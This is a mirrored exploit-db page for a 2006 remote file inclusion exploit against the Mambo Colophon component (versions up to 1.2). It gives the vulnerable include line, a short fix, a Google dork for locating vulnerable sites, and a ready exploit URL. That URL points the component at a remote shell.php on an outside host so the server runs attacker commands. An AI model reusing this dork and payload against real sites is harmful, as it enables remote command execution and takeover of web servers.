bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/2085.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

23 lines
No EOL
592 B
Text
Raw Blame History

########### Command Mambo Colophon =<1.2 ##by #Drago84#########
Found By Drago84
Exclusive Security Italian Security
This bug allows a remote atacker to execute commands via rfi
page:
admin.colophon.php
bug:
require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");
path:
add in admin.colophon.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );
dork: inurl:com_colophon
expl:
htttp:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?
# milw0rm.com [2006-07-29]
Reference in a new issue View git blame Copy permalink